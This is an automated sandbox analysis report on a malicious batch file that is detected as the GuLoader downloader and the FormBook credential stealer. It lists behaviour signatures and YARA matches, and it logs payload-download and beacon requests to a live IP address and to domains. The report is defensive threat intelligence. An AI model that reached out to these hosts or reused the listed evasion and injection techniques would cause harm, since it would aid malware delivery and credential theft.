Windows Analysis Report
Doc_004024024001.bat

Overview

General Information

Sample name:	Doc_004024024001.bat
Analysis ID:	1431497
MD5:	dfdb6404a262056b5e81e9bd0814d8aa
SHA1:	c6f2e620bbe3539d4a962c8b5509445ca0be2333
SHA256:	780eb381525edae3d27084370ae2e02dc4607842ccee9a8daae733475eb699bc
Tags:	bat
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.oyoing.com	Virustotal: Detection: 9%	Perma Link
Source: www.tyaer.com	Virustotal: Detection: 10%	Perma Link
Source: http://87.121.105.163	Virustotal: Detection: 18%	Perma Link

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.2869919929.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2313216444.0000000002D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870468418.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2872962180.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870539182.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2350818300.00000000252F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2871400550.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb\| source: powershell.exe, 00000005.00000002.2024149696.0000000008611000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbi source: powershell.exe, 00000005.00000002.2020862887.0000000007490000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5` source: powershell.exe, 00000005.00000002.2008604856.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5@ source: powershell.exe, 00000005.00000002.2008604856.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: t.Automation.pdb source: powershell.exe, 00000005.00000002.2008604856.0000000002D54000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2020862887.0000000007432000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2024149696.0000000008611000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?\C:\Windows\System.Core.pdbL source: powershell.exe, 00000005.00000002.2024300968.0000000008663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %^qm.Core.pdbh source: powershell.exe, 00000005.00000002.2024300968.0000000008663000.00000004.00000020.00020000.00000000.sdmp

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View	IP Address: 47.91.88.207 47.91.88.207

Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.163

Source: global traffic	HTTP traffic detected: GET /Punktet.hhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TjtonPwEiP175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gnbc/?zJeP=Xbjl2p0h-LP&Nr=L9JeOsoYfW7LuiHbEVFIUxrrDEUMATYC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7darwqgM7ePv0Xp25EyyEytypCDy9EhkfmkBo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

Source: global traffic	DNS traffic detected: DNS query: www.tyaer.com
Source: global traffic	DNS traffic detected: DNS query: www.oyoing.com
Source: global traffic	DNS traffic detected: DNS query: www.megabet303.lol
Source: global traffic	DNS traffic detected: DNS query: www.theplays.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Apr 2024 08:38:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BCC8BC549D53EE22AA10BCC51E0054033F8F3F985665509D422F7314A00Set-Cookie: _csrf=22f92dd2106e2fbe987a333ff1d123faeb00c04eb6ad213ca57619b7d83dcc94a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Gfc-qiP4I9WJKcSYWA1X4uyRp-lLUIMZ%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 35 74 32 6f 44 48 71 31 6b 61 70 58 42 71 56 73 42 51 6e 4c 61 61 45 37 68 75 59 6b 4c 53 56 31 72 34 7a 54 72 56 56 2d 68 4e 69 68 75 38 73 68 43 39 7a 42 6e 68 34 5f 38 69 5a 4f 61 70 67 77 39 6e 71 33 76 68 42 59 58 43 66 66 6f 62 5f 68 41 44 66 4a 67 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="

Source: powershell.exe, 00000002.00000002.2211361743.000001C0AB31E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2211361743.000001C0A96AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163
Source: powershell.exe, 00000002.00000002.2211361743.000001C0A96AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Punktet.hhpP
Source: powershell.exe, 00000005.00000002.2009616507.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.163/Punktet.hhpXR
Source: powershell.exe, 00000002.00000002.2211361743.000001C0AB31E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.H:
Source: powershell.exe, 00000002.00000002.2349440816.000001C0B94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2014092746.0000000005959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2009616507.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2211361743.000001C0A9481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2009616507.00000000048F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2009616507.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2020862887.0000000007432000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coe
Source: powershell.exe, 00000002.00000002.2211361743.000001C0A9481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2009616507.00000000048F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2014092746.0000000005959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2014092746.0000000005959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2014092746.0000000005959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2009616507.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2211361743.000001C0AA863000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2349440816.000001C0B94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2014092746.0000000005959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.2869919929.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2313216444.0000000002D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870468418.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2872962180.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2870539182.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2350818300.00000000252F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2871400550.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_5984.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_6528.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000C.00000002.2869919929.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2313216444.0000000002D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2870468418.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2872962180.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2870539182.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2350818300.00000000252F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2871400550.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5984, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3287
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3311
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3287	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3311	Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C135C0 NtCreateMutant,LdrInitializeThunk,	10_2_23C135C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12B60 NtClose,LdrInitializeThunk,	10_2_23C12B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_23C12DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_23C12C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12BE0 NtQueryValueKey,	10_2_23C12BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12BF0 NtAllocateVirtualMemory,	10_2_23C12BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12B80 NtQueryInformationFile,	10_2_23C12B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12BA0 NtEnumerateValueKey,	10_2_23C12BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12AD0 NtReadFile,	10_2_23C12AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12AF0 NtWriteFile,	10_2_23C12AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C12AB0 NtWaitForSingleObject,	10_2_23C12AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C139B0 NtGetContextThread,	10_2_23C139B0

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B8ACF51	2_2_00007FFD9B8ACF51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B8ADD01	2_2_00007FFD9B8ADD01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08441010	5_2_08441010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08440CC8	5_2_08440CC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084418E0	5_2_084418E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23CA03E6	10_2_23CA03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C97571	10_2_23C97571
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C8E4F6	10_2_23C8E4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C92446	10_2_23C92446
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BD1460	10_2_23BD1460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C9F43F	10_2_23C9F43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C96BD7	10_2_23C96BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BFFB80	10_2_23BFFB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C9AB40	10_2_23C9AB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C9FB76	10_2_23C9FB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C8DAC6	10_2_23C8DAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BDEA80	10_2_23BDEA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C25AA0	10_2_23C25AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C7DAAC	10_2_23C7DAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C9FA49	10_2_23C9FA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C97A46	10_2_23C97A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C53A6C	10_2_23C53A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BE29A0	10_2_23BE29A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23CAA9A6	10_2_23CAA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BF6962	10_2_23BF6962
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BE9950	10_2_23BE9950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BFB950	10_2_23BFB950
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BC68B8	10_2_23BC68B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23C0E8F0	10_2_23C0E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23BE38E0	10_2_23BE38E0

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: String function: 23BCB970 appears 67 times

Yara signature match

Source: amsi64_5984.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_6528.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000C.00000002.2869919929.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2313216444.0000000002D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.2870468418.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
